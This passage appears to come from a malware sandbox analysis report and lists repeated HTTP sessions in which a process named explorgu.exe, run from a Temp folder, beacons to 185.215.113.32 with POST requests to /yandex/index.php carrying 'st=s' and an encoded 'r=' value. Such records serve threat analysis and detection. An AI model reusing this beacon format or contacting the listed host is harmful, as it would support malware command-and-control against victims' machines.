                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            20192.168.2.449756185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:16.794368029 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:17.057238102 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:17.057868958 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:17.309133053 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            21192.168.2.449757185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:17.669246912 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:17.915575027 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:17 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:17.916292906 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:18.167505026 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:18 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            22192.168.2.449758185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:20.144989014 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:20.410391092 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:20.475729942 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:20.727001905 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:20 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            23192.168.2.449759185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:21.076903105 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:21.326603889 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:21.328459978 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:21.580173969 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            24192.168.2.449760185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:21.935646057 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:22.182121992 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:22.182987928 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:22.434596062 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            25192.168.2.449761185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:22.794312954 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:23.041431904 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:23.042254925 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:23.291672945 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            26192.168.2.449762185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:23.658849001 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:23.899071932 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:23.899945974 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:24.144256115 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            27192.168.2.449763185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:24.499536991 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:24.746104956 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:24.746912003 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:25.003061056 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            28192.168.2.449764185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:25.355571032 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:25.601207018 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:25 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:25.601851940 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:25.852494955 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:25 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            29192.168.2.449766185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:26.200587034 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:26.447999954 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:26 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:26.448815107 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:26.698363066 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:26 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            30192.168.2.449767185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:27.060482025 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:27.306986094 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:27.307823896 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:27.558861971 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
